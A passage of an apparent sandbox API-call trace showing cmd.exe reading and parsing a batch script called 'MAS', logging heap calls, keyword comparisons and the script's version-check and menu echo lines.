_String2="call") returned 15 [0179.408] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0179.408] GetProcessHeap () returned 0x19a8f1e0000 [0179.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0179.408] GetProcessHeap () returned 0x19a8f1e0000 [0179.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0179.408] GetProcessHeap () returned 0x19a8f1e0000 [0179.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x5a) returned 0x19a8f1eaed0 [0179.408] GetProcessHeap () returned 0x19a8f1e0000 [0179.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0179.408] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0179.408] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0179.408] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0179.408] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0179.409] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0179.409] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0179.409] GetProcessHeap () returned 0x19a8f1e0000 [0179.409] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0179.409] GetProcessHeap () returned 0x19a8f1e0000 [0179.409] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6b0 [0179.409] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.409] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1bc2 [0179.409] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efead0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efead0*=0x1fff, lpOverlapped=0x0) returned 1 [0179.409] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7158, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1bf6 [0179.409] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo You are running outdated version MAS %masver%\r\n", cbMultiByte=52, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo You are running outdated version MAS %masver%\r\n_\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 52 [0179.409] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.409] GetFileType (hFile=0xa0) returned 0x1 [0179.409] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.409] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1bf6 [0179.409] GetProcessHeap () returned 0x19a8f1e0000 [0179.410] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.410] GetProcessHeap () returned 0x19a8f1e0000 [0179.410] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f216d90 [0179.410] GetProcessHeap () returned 0x19a8f1e0000 [0179.410] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb980 [0179.410] GetEnvironmentVariableW (in: lpName="masver", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3 [0179.410] GetProcessHeap () returned 0x19a8f1e0000 [0179.410] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0179.410] GetProcessHeap () returned 0x19a8f1e0000 [0179.411] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f216d90) returned 1 [0179.411] GetProcessHeap () returned 0x19a8f1e0000 [0179.412] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.412] GetProcessHeap () returned 0x19a8f1e0000 [0179.412] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0179.412] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.412] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.412] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.412] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.412] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.413] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.413] GetProcessHeap () returned 0x19a8f1e0000 [0179.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0179.413] GetProcessHeap () returned 0x19a8f1e0000 [0179.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb980 [0179.413] GetProcessHeap () returned 0x19a8f1e0000 [0179.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x64) returned 0x19a8f1eaf40 [0179.413] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.413] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1bf6 [0179.413] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeaa0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeaa0*=0x1fff, lpOverlapped=0x0) returned 1 [0179.413] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7213, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c2d [0179.413] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ________________________________________________\r\n", cbMultiByte=55, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo ________________________________________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 55 [0179.413] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.413] GetFileType (hFile=0xa0) returned 0x1 [0179.413] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.413] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c2d [0179.413] GetProcessHeap () returned 0x19a8f1e0000 [0179.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.414] GetProcessHeap () returned 0x19a8f1e0000 [0179.414] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.414] GetProcessHeap () returned 0x19a8f1e0000 [0179.414] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0179.414] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.414] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.414] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.414] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.415] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.415] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.415] GetProcessHeap () returned 0x19a8f1e0000 [0179.415] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0179.415] GetProcessHeap () returned 0x19a8f1e0000 [0179.415] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0179.415] GetProcessHeap () returned 0x19a8f1e0000 [0179.415] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1ef2a0 [0179.415] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.415] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c2d [0179.415] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea70, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea70*=0x1fff, lpOverlapped=0x0) returned 1 [0179.415] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7220, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c34 [0179.415] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n______________________________________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 7 [0179.415] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.415] GetFileType (hFile=0xa0) returned 0x1 [0179.415] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.415] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c34 [0179.415] GetProcessHeap () returned 0x19a8f1e0000 [0179.415] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.415] GetProcessHeap () returned 0x19a8f1e0000 [0179.416] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.416] GetProcessHeap () returned 0x19a8f1e0000 [0179.416] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0179.416] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0179.416] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0179.416] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0179.416] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0179.416] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0179.416] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0179.416] GetProcessHeap () returned 0x19a8f1e0000 [0179.416] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0179.416] GetProcessHeap () returned 0x19a8f1e0000 [0179.416] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0179.416] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.416] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c34 [0179.416] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea40, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea40*=0x1fff, lpOverlapped=0x0) returned 1 [0179.416] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7253, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c55 [0179.417] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not defined _MASunattended (\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if not defined _MASunattended (\r\n____________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 33 [0179.417] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.417] GetFileType (hFile=0xa0) returned 0x1 [0179.417] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.417] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c55 [0179.417] GetProcessHeap () returned 0x19a8f1e0000 [0179.417] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.417] GetProcessHeap () returned 0x19a8f1e0000 [0179.417] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0179.418] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0179.418] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0179.418] _wcsicmp (_String1="IF", _String2="if") returned 0 [0179.418] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec800 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb740 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb740, Size=0x1a) returned 0x19a8f1eb770 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb770) returned 0x1a [0179.418] _wcsicmp (_String1="not", _String2="/I") returned 63 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd60 [0179.418] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0179.418] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0179.418] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0179.418] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0179.418] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220260 [0179.418] GetProcessHeap () returned 0x19a8f1e0000 [0179.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb740 [0179.418] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0179.419] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0179.419] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0179.419] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0179.419] GetProcessHeap () returned 0x19a8f1e0000 [0179.419] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0ab0 [0179.419] GetProcessHeap () returned 0x19a8f1e0000 [0179.419] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8760 [0179.419] GetProcessHeap () returned 0x19a8f1e0000 [0179.419] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8760, Size=0x30) returned 0x19a8f1e0fb0 [0179.419] GetProcessHeap () returned 0x19a8f1e0000 [0179.419] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0fb0) returned 0x30 [0179.419] GetProcessHeap () returned 0x19a8f1e0000 [0179.419] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f2a0 [0179.419] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.419] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c55 [0179.419] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe7d0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe7d0*=0x1fff, lpOverlapped=0x0) returned 1 [0179.419] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7278, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c6e [0179.419] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo [1] Get Latest MAS\r\n", cbMultiByte=25, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo [1] Get Latest MAS\r\nnded (\r\n____________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 25 [0179.419] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.419] GetFileType (hFile=0xa0) returned 0x1 [0179.419] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.419] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c6e [0179.419] GetProcessHeap () returned 0x19a8f1e0000 [0179.419] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.420] GetProcessHeap () returned 0x19a8f1e0000 [0179.420] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.420] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.420] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.420] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.420] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.420] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.420] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.420] GetProcessHeap () returned 0x19a8f1e0000 [0179.420] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2209e0 [0179.420] GetProcessHeap () returned 0x19a8f1e0000 [0179.420] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f0300 [0179.420] GetProcessHeap () returned 0x19a8f1e0000 [0179.420] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0b30 [0179.421] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.421] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c6e [0179.421] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe770, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe770*=0x1fff, lpOverlapped=0x0) returned 1 [0179.421] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7304, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c88 [0179.421] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo [0] Continue Anyway\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo [0] Continue Anyway\r\nded (\r\n____________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 26 [0179.421] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.421] GetFileType (hFile=0xa0) returned 0x1 [0179.421] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.421] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c88 [0179.421] GetProcessHeap () returned 0x19a8f1e0000 [0179.421] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.421] GetProcessHeap () returned 0x19a8f1e0000 [0179.422] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.422] GetProcessHeap () returned 0x19a8f1e0000 [0179.422] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f360 [0179.422] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.422] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.422] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.422] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.422] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.422] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.422] GetProcessHeap () returned 0x19a8f1e0000 [0179.422] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fde0 [0179.422] GetProcessHeap () returned 0x19a8f1e0000 [0179.422] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1efbe0 [0179.422] GetProcessHeap () returned 0x19a8f1e0000 [0179.422] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f8ff0 [0179.422] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.422] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c88 [0179.423] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe740, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe740*=0x1fff, lpOverlapped=0x0) returned 1 [0179.423] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7311, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c8f [0179.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n] Continue Anyway\r\nded (\r\n____________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 7 [0179.423] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.423] GetFileType (hFile=0xa0) returned 0x1 [0179.423] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.423] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c8f [0179.423] GetProcessHeap () returned 0x19a8f1e0000 [0179.423] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.423] GetProcessHeap () returned 0x19a8f1e0000 [0179.424] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.424] GetProcessHeap () returned 0x19a8f1e0000 [0179.424] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fd20 [0179.424] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0179.424] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0179.424] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0179.424] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0179.424] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0179.424] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0179.424] GetProcessHeap () returned 0x19a8f1e0000 [0179.424] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220ce0 [0179.424] GetProcessHeap () returned 0x19a8f1e0000 [0179.424] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1efdc0 [0179.424] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.424] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c8f [0179.424] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe710, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe710*=0x1fff, lpOverlapped=0x0) returned 1 [0179.424] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1cd4 [0179.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %_Green% \"Enter a menu option in the Keyboard [1,0] :\"\r\n", cbMultiByte=69, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="call :_color %_Green% \"Enter a menu option in the Keyboard [1,0] :\"\r\nfind \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 69 [0179.425] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.425] GetFileType (hFile=0xa0) returned 0x1 [0179.425] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.425] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1cd4 [0179.425] GetProcessHeap () returned 0x19a8f1e0000 [0179.425] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.425] GetProcessHeap () returned 0x19a8f1e0000 [0179.425] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f216d90 [0179.425] GetProcessHeap () returned 0x19a8f1e0000 [0179.425] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1f01b0 [0179.425] GetEnvironmentVariableW (in: lpName="_Green", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x8 [0179.426] GetProcessHeap () returned 0x19a8f1e0000 [0179.426] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f01b0) returned 1 [0179.426] GetProcessHeap () returned 0x19a8f1e0000 [0179.426] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f216d90) returned 1 [0179.427] GetProcessHeap () returned 0x19a8f1e0000 [0179.427] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.428] GetProcessHeap () returned 0x19a8f1e0000 [0179.428] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2201a0 [0179.428] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0179.428] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0179.428] _wcsicmp (_String1="IF", _String2="call") returned 6 [0179.428] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0179.428] _wcsicmp (_String1="REM", _String2="call") returned 15 [0179.428] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0179.428] GetProcessHeap () returned 0x19a8f1e0000 [0179.428] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 